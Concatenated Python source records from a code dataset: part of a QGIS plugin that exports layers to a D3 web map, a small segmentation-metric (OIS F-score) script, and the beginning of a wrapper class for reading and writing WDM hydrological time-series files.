\"\"\"Get a unique full path to a file\"\"\"\n if os.path.exists(fullPath):\n \n path, name = os.path.split(fullPath)\n name, ext = os.path.splitext(name) \n make = lambda i: os.path.join(path, '%s(%d)%s' % (name, i, ext))\n \n for i in xrange(2, sys.maxint):\n fullPath = make(i)\n if not os.path.exists(fullPath):\n break\n \n return fullPath\n \n def getDestShpFile(self, uid, layer):\n \"\"\"Get the destination path to the shapefile\"\"\"\n dest = self.getDestShpFolder(uid)\n \n fullPath = self.getUniqueFilePath(os.path.join(dest, layer.name + \".shp\"))\n \n return fullPath\n \n def getDestShpFolder(self, uid):\n \"\"\"Get the destination shapefile folder path\"\"\"\n folder = self.getDestFolder(uid)\n return os.path.join(folder, \"shp\")\n \n def getDestIndexFile(self, uid):\n \"\"\"Get the destination index file path\"\"\"\n folder = self.getDestFolder(uid)\n return os.path.join(folder, \"index.html\")\n \n def getDestCssFile(self, uid):\n \"\"\"Get the destination CSS file path\"\"\"\n folder = self.getDestFolder(uid)\n return os.path.join(folder, \"css\", self.__cssFile)\n \n def getDestDataFile(self, uid):\n \"\"\"Get the destination info file path\"\"\"\n folder = self.getDestFolder(uid)\n return os.path.join(folder, \"data/info.csv\")\n \n def getDestLegendFile(self, uid):\n \"\"\"Get the destination legend file path\"\"\"\n folder = self.getDestFolder(uid)\n return os.path.join(folder, \"data/legend.csv\")\n \n def getDestJsonFolder(self, uid):\n \"\"\"Get the destination json folder\"\"\"\n folder = 
self.getDestFolder(uid)\n return os.path.join(folder, \"json\")\n \n def getDestImgFolder(self, uid):\n \"\"\"Get the destination image file path\"\"\"\n folder = self.getDestFolder(uid)\n return os.path.join(folder, \"img\")\n \n def copyImgFiles(self, uid, renderers):\n \"\"\"Copy any external image files for the layer symbology to the destination folder\n \n :param uid: Unique identifier for the destination folder \n :type uid: string\n \n :param renderers: List of renderers associated with the layer symbology (categorised and graduated renderers will have more than one)\n :type renderers: list[d3MapRenderer.symbology.singleSymbol]\n \n \"\"\"\n \n for renderer in renderers:\n if renderer.symbol.hasImage() == True:\n head, tail = os.path.split(renderer.symbol.path)\n shutil.copyfile(renderer.symbol.path, os.path.join(self.getDestImgFolder(uid), tail))\n \n \n def addColumns(self, layer):\n \"\"\"Add new columns to hold the color and size used in symbology\"\"\"\n if self.__qgis.hasField(layer, self.__colorField) == False:\n self.__qgis.addField(layer, self.__colorField) \n if self.__qgis.hasField(layer, self.__sizeField) == False:\n self.__qgis.addField(layer, self.__sizeField) \n \n def getSafeString(self, val):\n \"\"\"Return a string considered safe for use in file names\"\"\"\n pattern = re.compile('[\\W_]+', re.UNICODE)\n return pattern.sub(\"\", val) \n \n def getLayerObjectName(self, index):\n \"\"\"Get a unique layer name as an object within topojson\"\"\"\n return \"l\" + str(index)\n \n def getProgressTicks(self):\n \"\"\"Get the number of progress steps\"\"\"\n layers = self.getLayersForOutput()\n return 3 + (7 * len(layers))\n \n def areLayersModified(self):\n \"\"\"Have the chosen layers been modified?\"\"\"\n isEdit = False\n \n layers = self.getLayersForOutput()\n for vect in layers: \n if vect.layer.isEditable() == True and vect.layer.isModified() == True:\n isEdit = True\n break\n \n return isEdit\n \n def logExportParams(self, main):\n \"\"\"Log the parameters to the log messages panel\"\"\"\n template = u\" {0} = [{1}]\"\n \n self.__logger.info(template.format(\"Title\", self.title))\n self.__logger.info(template.format(\"Header\", str(self.showHeader)))\n self.__logger.info(template.format(\"Width\", str(self.width)))\n self.__logger.info(template.format(\"Height\", str(self.height)))\n self.__logger.info(template.format(\"Main layer\", main.name))\n self.__logger.info(template.format(\"IDField\", self.idField))\n self.__logger.info(template.format(\"Projection\", self.selectedProjection.name))\n self.__logger.info(template.format(\"Format\", self.selectedFormat.name))\n self.__logger.info(template.format(\"Simplify\", self.simplification))\n self.__logger.info(template.format(\"Output\", self.outputFolder))\n self.__logger.info(template.format(\"Zoom/Pan\", str(self.panZoom)))\n self.__logger.info(template.format(\"Legend\", str(self.legend)))\n self.__logger.info(template.format(\"LegendPos\", self.legendPositions[self.selectedLegendPosition]))\n \n extras = []\n layers = self.getLayersForOutput()\n for l in layers:\n extras.append(l.name)\n self.__logger.info(template.format(\"IncExtras\", str(self.extraVectors)))\n self.__logger.info(template.format(\"Extras\", \", \".join(extras)))\n \n self.__logger.info(template.format(\"IncPopup\", str(self.popup)))\n self.__logger.info(template.format(\"PopupPos\", self.popupPositions[self.selectedPopupPosition]))\n self.__logger.info(template.format(\"Popup\", self.getPopupTemplate()))\n \n 
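# Finally log the data visualization settings.\n 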
self.__logger.info(template.format(\"IncViz\", str(self.hasViz)))\n self.__logger.info(template.format(\"Chart\", self.selectedVizChart.name))\n self.__logger.info(template.format(\"VizWidth\", str(self.vizWidth)))\n self.__logger.info(template.format(\"DataRanges\", self.getDataRangePreview())) \n self.__logger.info(template.format(\"Labels\", \", \".join(self.vizLabels))) \n\n \n def export(self, progress, webServerUrl):\n \"\"\"Main export function. Do the stuff.\n \n :param progress: Progress bar widget.\n :type progress: QProgressBar\n \"\"\"\n tick = 0\n progress.setValue(tick)\n \n main = self.getMainLayer()\n \n if main is not None: \n self.__logger.info(\"EXPORT start ==================================================\")\n self.logExportParams(main)\n \n # Create a class to help in replacing all the JavaScript in the index.html file\n outVars = outputVars(main.layer, self.title, self.width, self.height, self.showHeader, self.idField, \n (self.selectedPopupPosition == 1), \n self.legend, self.panZoom, self.selectedLegendPosition,\n self.selectedVizChart, self.__ranges, self.vizLabels,\n self.vizHeight, self.vizWidth, self.showLabels) \n # Initialise bounding box for projection with full \n bbox = bound()\n\n # Create the directory structure\n self.__logger.info(\"EXPORT copying folders and files\")\n uid = self.getUniqueFolderName()\n self.createFolders(uid)\n \n tick+=1\n progress.setValue(tick)\n \n # Get QgsVectorLayers in correct order\n layers = self.getLayersForOutput()\n \n # List for all QgsVectorLayers symbology\n symbols = []\n \n # List for all QgsVectorLayers label styles\n labels = [] \n\n for i, vect in enumerate(layers): \n self.__logger.info(\"EXPORT \" + vect.name) \n vect.filePath = self.getDestShpFile(uid, vect)\n \n renderer = vect.layer.rendererV2()\n \n self.__qgis.saveShape(vect.layer, vect.filePath)\n\n tick+=1\n progress.setValue(tick)\n \n # Re-open saved shape file now its available for editing \n destLayer = self.__qgis.openShape(vect.filePath, vect.name) \n \n # Read the extent of the layer now its in the correct crs\n if vect.main == True:\n extent = destLayer.extent()\n bbox.setLeft(extent.xMinimum())\n bbox.setBottom(extent.yMinimum())\n bbox.setRight(extent.xMaximum())\n bbox.setTop(extent.yMaximum())\n \n # Add a color column\n self.addColumns(destLayer)\n tick+=1\n progress.setValue(tick)\n \n # Read colors from the QgsVectorLayer\n syms = self.getSymbology(renderer, destLayer, vect.transparency, i)\n tick+=1\n progress.setValue(tick)\n \n # Write color column to the QgsVectorLayer\n self.writeSymbology(destLayer, syms)\n tick+=1\n progress.setValue(tick)\n \n # Close the shapefile\n del destLayer\n \n # Determine the attributes to preserve from the shapefile\n # Limited to color, id and label fields\n # Popup attributes are preserved in a CSV file \n preserveAttributes = [self.__colorField, self.__sizeField]\n \n # Get any labels for the QgsVectorLayer\n label = labeling(vect.layer, i)\n if self.showLabels == True and label.hasLabels() == True:\n labels.append(label)\n preserveAttributes.append(label.fieldName)\n \n tick+=1\n progress.setValue(tick) \n \n # Only output the id field for the main layer\n idAttribute = \"\"\n if vect.main == True:\n idAttribute = self.idField \n \n # Create the output json file\n path = self.getDestJsonFolder(uid) \n name = self.getSafeString(vect.name) \n objName = self.getLayerObjectName(i) \n \n # And then store the details in order to write the index file\n destPath = self.getUniqueFilePath(os.path.join(path, 
name + self.selectedFormat.extension))\n objName, name = self.selectedFormat.convertShapeFile(path, destPath, vect.filePath, objName, self.simplification, idAttribute, preserveAttributes)\n \n hasTip = vect.main and self.popup \n hasViz = vect.main and self.hasViz\n outlineWidth = syms.getAvergageOutlineWidth() \n \n # Store the QgsVectorLayer symbols in a single list now that the average outline width has been calculated\n symbols.extend(syms)\n \n tick+=1\n progress.setValue(tick) \n \n outVars.outputLayers.append(outputLayer(objName, name, outlineWidth, vect.main, hasTip, hasViz, syms))\n \n if self.legend and vect.main:\n # Create the legend for the main layer\n self.writeLegendFile(uid, syms) \n \n tick+=1\n progress.setValue(tick) \n \n # Write symbol styles\n self.writeCss(uid, symbols, labels) \n \n # Copy any external SVG files\n self.copyImgFiles(uid, symbols)\n \n # Alter the index file\n n = self.getDestIndexFile(uid)\n \n self.selectedFormat.writeIndexFile(n, outVars, bbox, self.selectedProjection, self.__selectedFields, labels)\n tick+=1\n progress.setValue(tick)\n \n '''Order of things is important\n writeDataFile() appends an ID field if not already in the popup\n Would result in the popup template potentially having an unexpected ID field'''\n if self.popup == True or self.hasViz == True:\n self.__logger.info(\"EXPORT popup data\")\n # Create the data files\n self.writeDataFile(uid) \n \n # Now zip up the shapefiles\n self.zipShpFiles(uid)\n \n self.__logger.info(\"EXPORT complete =========================================================\")\n \n tick+=1\n progress.setValue(tick)\n \n # start browser\n webbrowser.open_new_tab(\"{0}{1}/index.html\".format(webServerUrl, uid))\n \n \nclass vector:\n \"\"\"Base class for the layer abstracting away the QGIS details\"\"\"\n \n def __init__(self, iface, layer):\n \"\"\"Initialise the layer\"\"\"\n \n self.rendererType = 0\n self.id = layer.id()\n self.name = layer.name()\n self.layer = layer\n self.filePath = \"\"\n self.main = False\n self.extra = iface.legendInterface().isLayerVisible(layer)\n self.type = layer.type()\n self.fields = []\n self.vizFields = []\n self.defaultId = \"\" \n\n \n self.isVisible = iface.legendInterface().isLayerVisible(layer) \n self.transparency = 1 - (float(layer.layerTransparency()) / 100)\n for f in layer.pendingFields():\n # Add to the list of fields\n self.fields.append(f.name()) \n \n # Add numeric fields to the list for visualization\n if f.typeName().lower() == \"integer\" or f.typeName().lower() == \"real\" or f.typeName().lower() == \"integer64\":\n self.vizFields.append(f.name())\n \n # An ID field? 
Set the default for the ID field option \n upper = f.name().upper() \n if upper == \"ID\" or upper == \"OBJECT_ID\" or upper == \"OBJECTID\":\n self.defaultId = f.name()\n \n \n renderer = layer.rendererV2()\n dump = renderer.dump()\n \n \n if dump[0:6] == \"SINGLE\":\n self.rendererType = 0 \n elif dump[0:11] == \"CATEGORIZED\":\n self.rendererType = 1 \n elif dump[0:9] == \"GRADUATED\":\n self.rendererType = 2\n \n def isSingleRenderer(self):\n \"\"\"Is this a single renderer type?\"\"\"\n return self.rendererType == 0\n \n ","sub_path":"logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":35457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"149673228","text":"# Author: Yahui Liu \n\n\"\"\"\nCalculate sensitivity and specificity metrics:\n - Precision\n - Recall\n - F-score\n\"\"\"\n\nimport numpy as np\n\nfrom tqdm import tqdm\n\n\ndef cal_ois_metrics(pred_list, gt_list, thresh_step=0.01):\n final_accuracy_all = []\n for pred, gt in zip(pred_list, gt_list):\n statistics = []\n for thresh in np.arange(0.0, 1.0, thresh_step):\n gt_img = (gt / 255).astype('uint8')\n pred_img = (pred / 255 > thresh).astype('uint8')\n tp, fp, fn = get_statistics(pred_img, gt_img)\n p_acc = 1.0 if tp == 0 and fp == 0 else tp / (tp + fp)\n r_acc = tp / (tp + fn)\n # print(r_acc+ p_acc)\n # print(2 * p_acc * r_acc / (p_acc + r_acc))\n if p_acc + r_acc == 0:\n f1 = 0\n else:\n f1 = 2 * p_acc * r_acc / (p_acc + r_acc)\n statistics.append([thresh, f1])\n max_f = np.amax(statistics, axis=0)\n final_accuracy_all.append(max_f[1])\n return np.mean(final_accuracy_all)\n\ndef get_statistics(pred, gt):\n \"\"\"\n return tp, fp, fn\n \"\"\"\n tp = np.sum((pred == 1) & (gt == 1))\n fp = np.sum((pred == 1) & (gt == 0))\n fn = np.sum((pred == 0) & (gt == 1))\n return [tp, fp, fn]\n","sub_path":"evalauation/calculate_OIS.py","file_name":"calculate_OIS.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"608676835","text":"#!/usr/bin/env python2\n\"\"\"Utilities to work with WDM files.\n\nThe WDM class supplies a series of utilities for working with WDM files\nwith Python. 
The class uses f2py to wrap the minimally necessary WDM\nroutines.\n\"\"\"\n\nfrom __future__ import print_function\n\nimport datetime\nimport os\nimport os.path\nimport re\n\nimport pandas as pd\n\nfrom lockfile import LockFile\n\nimport _wdm_lib\nfrom tstoolbox import tsutils\n\n# Load in WDM subroutines\n\n# Mapping between WDM TCODE and pandas interval code\nMAPTCODE = {\n 1: 'S',\n 2: 'T',\n 3: 'H',\n 4: 'D',\n 5: 'MS',\n 6: 'AS',\n}\n\nMAPFREQ = {\n 'S': 1,\n 'T': 2,\n 'H': 3,\n 'D': 4,\n 'M': 5,\n 'A': 6,\n}\n\n\nclass WDMError(Exception):\n \"\"\"The default Error class.\"\"\"\n\n pass\n\n\nclass DSNDoesNotExist(Exception):\n \"\"\"The Error class if DSN does no exist.\"\"\"\n\n def __init__(self, dsn):\n \"\"\"Initialize DSN number.\"\"\"\n self.dsn = dsn\n\n def __str__(self):\n \"\"\"Print detailed error message.\"\"\"\n if self.dsn < 1 or self.dsn > 32000:\n return \"\"\"\n*\n* The DSN number must be >= 1 and <= 32000.\n* You supplied {0}.\n*\n\"\"\".format(self.dsn)\n\n return \"\"\"\n*\n* The DSN {0} does not exist in the dataset.\n*\n\"\"\".format(self.dsn)\n\n\nclass WDMFileExists(Exception):\n \"\"\"Error class if WDM file exist.\"\"\"\n\n def __init__(self, filename):\n \"\"\"Initialize filename.\"\"\"\n self.filename = filename\n\n def __str__(self):\n \"\"\"Return detailed error message.\"\"\"\n return \"\"\"\n*\n* File {0} exists.\n*\n\"\"\".format(self.filename)\n\n\nclass DSNExistsError(Exception):\n \"\"\"Error class if DSN exist.\"\"\"\n\n def __init__(self, dsn):\n \"\"\"Initialize DSN.\"\"\"\n self.dsn = dsn\n\n def __str__(self):\n \"\"\"Return detailed error message.\"\"\"\n return \"\"\"\n*\n* DSN {0} exists.\n*\n\"\"\".format(self.dsn)\n\n\nclass WDM(object):\n \"\"\"Class to open and read from WDM files.\"\"\"\n\n def __init__(self):\n \"\"\"Set functions from WDM library to class function objects.\"\"\"\n # timcvt: Convert times to account for 24 hour\n # timdif: Time difference\n # wdmopn: Open WDM file\n # wdbsac: Set string attribute\n # wdbsai: Set integer attribute\n # wdbsar: Set real attribute\n # wdbckt: Check if DSN exists\n # wdflcl: Close WDM file\n # wdlbax: Create label for new DSN\n # wdtget: Get time-series data\n # wdtput: Write time-series data\n # wddsrn: Renumber a DSN\n # wddsdl: Delete a DSN\n # wddscl: Copy a label\n\n self.timcvt = _wdm_lib.timcvt\n self.timdif = _wdm_lib.timdif\n self.wdbopn = _wdm_lib.wdbopn\n self.wdbsac = _wdm_lib.wdbsac\n self.wdbsai = _wdm_lib.wdbsai\n self.wdbsar = _wdm_lib.wdbsar\n self.wdbsgc = _wdm_lib.wdbsgc\n self.wdbsgi = _wdm_lib.wdbsgi\n self.wdbsgr = _wdm_lib.wdbsgr\n self.wdckdt = _wdm_lib.wdckdt\n self.wdflcl = _wdm_lib.wdflcl\n self.wdlbax = _wdm_lib.wdlbax\n self.wdtget = _wdm_lib.wdtget\n self.wdtput = _wdm_lib.wdtput\n self.wtfndt = _wdm_lib.wtfndt\n self.wddsrn = _wdm_lib.wddsrn\n self.wddsdl = _wdm_lib.wddsdl\n self.wddscl = _wdm_lib.wddscl\n\n self.openfiles = {}\n\n def wmsgop(self):\n \"\"\"WMSGOP is a simple open of the message file.\"\"\"\n afilename = os.path.join(os.path.dirname(__file__),\n 'message.wdm')\n return self._open(afilename, 50, ronwfg=1)\n\n def dateconverter(self, datestr):\n \"\"\"Extract and convert dates.\n\n Extract all of the grouped numbers out of a string\n to create an array suitable for dates and times.\n \"\"\"\n words = re.findall(r'\\d+', str(datestr))\n words = [int(i) for i in words]\n dtime = [1900, 1, 1, 0, 0, 0]\n dtime[:len(words)] = words\n return pd.np.array(dtime)\n\n def _open(self, wdname, wdmsfl, ronwfg=0):\n \"\"\"Private method to open WDM 
file.\"\"\"\n wdname = wdname.strip()\n if wdname not in self.openfiles:\n if ronwfg == 1:\n if not os.path.exists(wdname):\n raise ValueError(\"\"\"\n*\n* Trying to open\n* {0}\n* in read-only mode and it cannot be found.\n*\n \"\"\".format(wdname))\n retcode = self.wdbopn(wdmsfl,\n wdname,\n ronwfg)\n self._retcode_check(retcode, additional_info='wdbopn')\n self.openfiles[wdname] = wdmsfl\n return wdmsfl\n\n def _retcode_check(self, retcode, additional_info=' '):\n \"\"\"Central place to run through the return code.\"\"\"\n if retcode == 0:\n return\n retcode_dict = {\n -1: 'non specific error on WDM file open',\n -4: \"\"\"copy/update failed due to data overlap problem - part of\n source needed\"\"\",\n -5: 'copy/update failed due to data overlap problem',\n -6: 'no data present',\n -8: 'bad dates',\n -9: 'data present in current group',\n -10: 'no date in this group',\n -11: 'no non-missing data, data has not started yet',\n -14: 'data specified not within valid range for data set',\n -15: \"\"\"time units and time step must match label exactly with\n VBTIME = 1\"\"\",\n -20: \"\"\"problem with one or more of\n GPGLG, DXX, NVAL, QUALVL, LTSTEP, LTUNIT\"\"\",\n -21: 'data from WDM does not match expected date',\n -23: 'not a valid table',\n -24: 'not a valid associated table',\n -25: 'template already exists',\n -26: 'can not add another table',\n -27: 'no tables to return info about',\n -28: 'table does not exist yet',\n -30: 'more than whole table',\n -31: 'more than whole extension',\n -32: 'data header does not match',\n -33: 'problems with row/space specs',\n -36: 'missing needed following data for a get',\n -37: 'no data present',\n -38: 'missing part of time required',\n -39: 'missing data group',\n -40: 'no data available',\n -41: 'no data to read',\n -42: 'overlap in existing group',\n -43: 'can not add another space time group',\n -44: 'trying to get/put more data that in block',\n -45: 'types do not match',\n -46: 'bad space time group specification parameter',\n -47: 'bad direction flag',\n -48: 'conflicting spec of space time dim and # of ts data sets',\n -49: 'group does not exist',\n -50: 'requested attributes missing from this data set',\n -51: 'no space for another DLG',\n -61: 'old data set does not exist',\n -62: 'new data set already exists',\n -71: 'data set already exists',\n -72: 'old data set does not exist',\n -73: 'new data set already exists',\n -81: 'data set does not exist',\n -82: 'data set exists, but is wrong DSTYP',\n -83: 'WDM file already open, can not create it',\n -84: 'data set number out of valid range',\n -85: 'trying to write to a read-only data set',\n -87: 'can not remove message WDM file from buffer',\n -88: 'can not open another WDM file',\n -89: 'check digit on 1st record of WDM file is bad',\n -101: 'incorrect character value for attribute',\n -102: 'attribute already on label',\n -103: 'no room on label for attribute',\n -104: 'data present, can not update attribute',\n -105: 'attribute not allowed for this type data set',\n -106: 'can not delete attribute, it is required',\n -107: 'attribute not present on this data set',\n -108: 'incorrect integer value for attribute',\n -109: 'incorrect real value for attribute',\n -110: 'attributes not found on message file',\n -111: 'attribute name not found (no match)',\n -112: 'more attributes exists which match SAFNAM',\n -121: 'no space for another attribute',\n 1: 'varies - generally more data/groups/table',\n 2: 'no more data available for this DLG group'\n }\n\n if retcode in retcode_dict:\n 
lopenfiles = self.openfiles.copy()\n for fn in lopenfiles:\n self._close(fn)\n raise WDMError(\"\"\"\n*\n* WDM library function returned error code {0}. {1}\n* WDM error: {2}\n*\n\"\"\".format(retcode, additional_info, retcode_dict[retcode]))\n if retcode != 0:\n for fn in self.openfiles:\n self._close(fn)\n raise WDMError(\"\"\"\n*\n* WDM library function returned error code {0}. {1}\n*\n\"\"\".format(retcode, additional_info))\n\n def renumber_dsn(self, wdmpath, odsn, ndsn):\n \"\"\"Will renumber the odsn to the ndsn.\"\"\"\n odsn = int(odsn)\n ndsn = int(ndsn)\n\n lock = LockFile(wdmpath)\n lock.acquire()\n wdmfp = self._open(wdmpath, 51)\n retcode = self.wddsrn(\n wdmfp,\n odsn,\n ndsn)\n lock.release()\n self._close(wdmpath)\n self._retcode_check(retcode, additional_info='wddsrn')\n\n def delete_dsn(self, wdmpath, dsn):\n \"\"\"Function to delete a DSN.\"\"\"\n dsn = int(dsn)\n\n lock = LockFile(wdmpath)\n lock.acquire()\n wdmfp = self._open(wdmpath, 52)\n testreturn = self.wdckdt(wdmfp, dsn)\n self._close(wdmpath)\n if testreturn != 0:\n wdmfp = self._open(wdmpath, 52)\n retcode = self.wddsdl(wdmfp,\n dsn)\n self._close(wdmpath)\n self._retcode_check(retcode, additional_info='wddsdl')\n lock.release()\n self._close(wdmpath)\n\n def copydsnlabel(self, inwdmpath, indsn, outwdmpath, outdsn):\n \"\"\"Will copy a complete DSN label from one DSN to another.\"\"\"\n assert inwdmpath != outwdmpath\n indsn = int(indsn)\n outdsn = int(outdsn)\n dsntype = 0\n inwdmfp = self._open(inwdmpath, 53, ronwfg=1)\n lock = LockFile(outwdmpath)\n lock.acquire()\n outwdmfp = self._open(outwdmpath, 54)\n retcode = self.wddscl(inwdmfp,\n indsn,\n outwdmfp,\n outdsn,\n dsntype)\n self._close(inwdmpath)\n lock.release()\n self._close(outwdmpath)\n self._retcode_check(retcode, additional_info='wddscl')\n\n def describe_dsn(self, wdmpath, dsn):\n \"\"\"Will collect some metadata about the DSN.\"\"\"\n wdmfp = self._open(wdmpath, 55, ronwfg=1)\n _, llsdat, lledat, retcode = self.wtfndt(\n wdmfp,\n dsn,\n 1) # GPFLG - get(1)/put(2) flag\n self._close(wdmpath)\n # Ignore retcode == -6 which means that the dsn doesn't have any data.\n # If it is a new dsn, of course it doesn't have any data.\n if retcode == -6:\n retcode = 0\n self._retcode_check(retcode, additional_info='wtfndt')\n\n wdmfp = self._open(wdmpath, 55, ronwfg=1)\n tstep, retcode = self.wdbsgi(\n wdmfp,\n dsn,\n 33, # saind = 33 for time step\n 1) # salen\n self._close(wdmpath)\n self._retcode_check(retcode, additional_info='wdbsgi')\n\n wdmfp = self._open(wdmpath, 55, ronwfg=1)\n tcode, retcode = self.wdbsgi(\n wdmfp,\n dsn,\n 17, # saind = 17 for time code\n 1) # salen\n self._close(wdmpath)\n self._retcode_check(retcode, additional_info='wdbsgi')\n\n wdmfp = self._open(wdmpath, 55, ronwfg=1)\n tsfill, retcode = self.wdbsgr(\n wdmfp,\n dsn,\n 32, # saind = 32 for tsfill\n 1) # salen\n self._close(wdmpath)\n # retcode = -107 if attribute not present\n if retcode == -107:\n # Since tsfill is used below, fall back to the default when it is not found.\n tsfill = -999.0\n retcode = 0\n else:\n tsfill = tsfill[0]\n self._retcode_check(retcode, additional_info='wdbsgr')\n\n wdmfp = self._open(wdmpath, 55, ronwfg=1)\n ostr, retcode = self.wdbsgc(\n wdmfp,\n dsn,\n 290, # saind = 290 for location\n 8) # salen\n self._close(wdmpath)\n if retcode == -107:\n ostr = ''\n retcode = 0\n self._retcode_check(retcode, additional_info='wdbsgc')\n\n wdmfp = self._open(wdmpath, 55, ronwfg=1)\n scen_ostr, retcode = self.wdbsgc(\n wdmfp,\n dsn,\n 288, # saind = 288 for scenario\n 8) # salen\n 
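# Scenario attribute (288) may be absent; retcode -107 is mapped to an empty string below.\n 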
self._close(wdmpath)\n if retcode == -107:\n scen_ostr = ''\n retcode = 0\n self._retcode_check(retcode, additional_info='wdbsgc')\n\n wdmfp = self._open(wdmpath, 55, ronwfg=1)\n con_ostr, retcode = self.wdbsgc(\n wdmfp,\n dsn,\n 289, # saind = 289 for constituent\n 8) # salen\n self._close(wdmpath)\n if retcode == -107:\n con_ostr = ''\n retcode = 0\n self._retcode_check(retcode, additional_info='wdbsgc')\n\n wdmfp = self._open(wdmpath, 55, ronwfg=1)\n base_year, retcode = self.wdbsgi(\n wdmfp,\n dsn,\n 27, # saind = 27 for base_year\n 1) # salen\n self._close(wdmpath)\n self._retcode_check(retcode, additional_info='wdbsgi')\n\n wdmfp = self._open(wdmpath, 55, ronwfg=1)\n desc_ostr, retcode = self.wdbsgc(\n wdmfp,\n dsn,\n 45, # saind = 45 for description\n 48) # salen\n self._close(wdmpath)\n if retcode == -107:\n desc_ostr = ''\n retcode = 0\n self._retcode_check(retcode, additional_info='wdbsgc')\n\n wdmfp = self._open(wdmpath, 55, ronwfg=1)\n tstype, retcode = self.wdbsgc(\n wdmfp,\n dsn,\n 1, # saind = 1 for tstype\n 4) # salen\n self._close(wdmpath)\n if retcode == -107:\n tstype = ''\n retcode = 0\n self._retcode_check(retcode, additional_info='wdbsgc')\n\n self.timcvt(llsdat)\n self.timcvt(lledat)\n try:\n sdate = datetime.datetime(*llsdat).date()\n except ValueError:\n sdate = None\n try:\n edate = datetime.datetime(*lledat).date()\n except ValueError:\n edate = None\n\n dateFormat_dict = {1: \"S\",\n 2: \"T\",\n 3: \"H\",\n 4: \"D\",\n 5: \"M\",\n 6: \"A\"}\n\n tstep = tstep[0]\n tcode = tcode[0]\n base_year = base_year[0]\n\n try:\n ostr = str(ostr, \"utf-8\").strip()\n scen_ostr = str(scen_ostr, \"utf-8\").strip()\n con_ostr = str(con_ostr, \"utf-8\").strip()\n desc_ostr = str(desc_ostr, \"utf-8\").strip()\n tstype = str(tstype, \"utf-8\").strip()\n except TypeError:\n ostr = ''.join(ostr).strip()\n scen_ostr = ''.join(scen_ostr).strip()\n con_ostr = ''.join(con_ostr).strip()\n desc_ostr = ''.join(desc_ostr).strip()\n tstype = ''.join(tstype).strip()\n\n return {'dsn': dsn,\n 'start_date': pd.Period(sdate, freq=dateFormat_dict[tcode]),\n 'end_date': pd.Period(edate, freq=dateFormat_dict[tcode]),\n 'llsdat': llsdat,\n 'lledat': lledat,\n 'tstep': tstep,\n 'tcode': tcode,\n 'tcode_name': MAPTCODE[tcode],\n 'location': ostr.strip(),\n 'scenario': scen_ostr.strip(),\n 'constituent': con_ostr.strip(),\n 'tsfill': tsfill,\n 'description': desc_ostr,\n 'base_year': base_year,\n 'tstype': tstype}\n\n def create_new_wdm(self, wdmpath, overwrite=False):\n \"\"\"Create a new WDM file.\"\"\"\n if overwrite and os.path.exists(wdmpath):\n self._close(wdmpath)\n os.remove(wdmpath)\n elif os.path.exists(wdmpath):\n raise WDMFileExists(wdmpath)\n ronwfg = 2\n self._open(wdmpath, 56, ronwfg=ronwfg)\n self._close(wdmpath)\n\n def set_dsn_attribute(self, wdmpath, dsn, attribute=None):\n \"\"\"Set DSN attributes.\"\"\"\n pass\n\n def create_new_dsn(self, wdmpath, dsn, tstype='', base_year=1900, tcode=4,\n tsstep=1, statid=' ', scenario='', location='',\n description='', constituent='', tsfill=-999.0):\n \"\"\"Create self.wdmfp/dsn.\"\"\"\n lock = LockFile(wdmpath)\n lock.acquire()\n wdmfp = self._open(wdmpath, 57)\n messfp = self.wmsgop()\n\n if self.wdckdt(wdmfp, dsn) == 1:\n self._close(wdmpath)\n raise DSNExistsError(dsn)\n\n # Parameters for wdlbax taken from ATCTSfile/clsTSerWDM.cls\n self.wdlbax(\n wdmfp,\n dsn,\n 1, # DSTYPE - always 1 for time series\n 10, # NDN - number of down pointers\n 10, # NUP - number of up pointers\n 30, # NSA - number of search attributes\n 100, # NSASP - 
amount of search attribute space\n 300, # NDP - number of data pointers\n ) # PSA - pointer to search attribute space\n\n for saind, salen, saval in [(34, 1, 6), # tgroup\n (83, 1, 1), # compfg\n (84, 1, 1), # tsform\n (85, 1, 1), # vbtime\n (17, 1, int(tcode)), # tcode\n (33, 1, int(tsstep)), # tsstep\n (27, 1, int(base_year)), # tsbyr\n ]:\n retcode = self.wdbsai(\n wdmfp,\n dsn,\n messfp,\n saind,\n salen,\n saval)\n self._retcode_check(retcode, additional_info='wdbsai')\n\n for saind, salen, saval in [(32, 1, tsfill)]: # tsfill\n retcode = self.wdbsar(\n wdmfp,\n dsn,\n messfp,\n saind,\n salen,\n saval)\n self._retcode_check(retcode, additional_info='wdbsar')\n\n for saind, salen, saval, error_name in [\n (2, 16, statid, 'Station ID'),\n (1, 4, tstype.upper(), 'Time series type - tstype'),\n (45, 48, description.upper(), 'Description'),\n (288, 8, scenario.upper(), 'Scenario'),\n (289, 8, constituent.upper(), 'Constituent'),\n (290, 8, location.upper(), 'Location'),\n ]:\n saval = saval.strip()\n if len(saval) > salen:\n raise ValueError(\"\"\"\n*\n* String \"{0}\" is too long for {1}. Must\n* have a length equal or less than {2}.\n*\n\"\"\".format(saval, error_name, salen))\n\n saval = '{0: <{1}}'.format(saval, salen)\n\n retcode = self.wdbsac(\n wdmfp,\n dsn,\n messfp,\n saind,\n salen,\n saval)\n self._retcode_check(retcode, additional_info='wdbsac')\n lock.release()\n self._close(wdmpath)\n\n def _tcode_date(self, tcode, date):\n \"\"\"Use tcode to set the significant parts of the date tuple.\"\"\"\n rdate = [1, 1, 1, 0, 0, 0]\n if tcode <= 6:\n rdate[0] = date[0]\n if tcode <= 5:\n rdate[1] = date[1]\n if tcode <= 4:\n rdate[2] = date[2]\n if tcode <= 3:\n rdate[3] = date[3]\n if tcode <= 2:\n rdate[4] = date[4]\n if tcode <= 1:\n rdate[5] = date[5]\n return rdate\n\n def write_dsn(self, wdmpath, dsn, data):\n \"\"\"Write to self.wdmfp/dsn the time-series data.\"\"\"\n dsn_desc = self.describe_dsn(wdmpath, dsn)\n tcode = dsn_desc['tcode']\n tstep = dsn_desc['tstep']\n tsfill = dsn_desc['tsfill']\n\n data.fillna(tsfill, inplace=True)\n start_date = data.index[0]\n\n dstart_date = start_date.timetuple()[:6]\n llsdat = self._tcode_date(tcode, dstart_date)\n if dsn_desc['base_year'] > llsdat[0]:\n raise ValueError(\"\"\"\n*\n* The base year for this DSN is {0}. All data to insert must be after the\n* base year. 
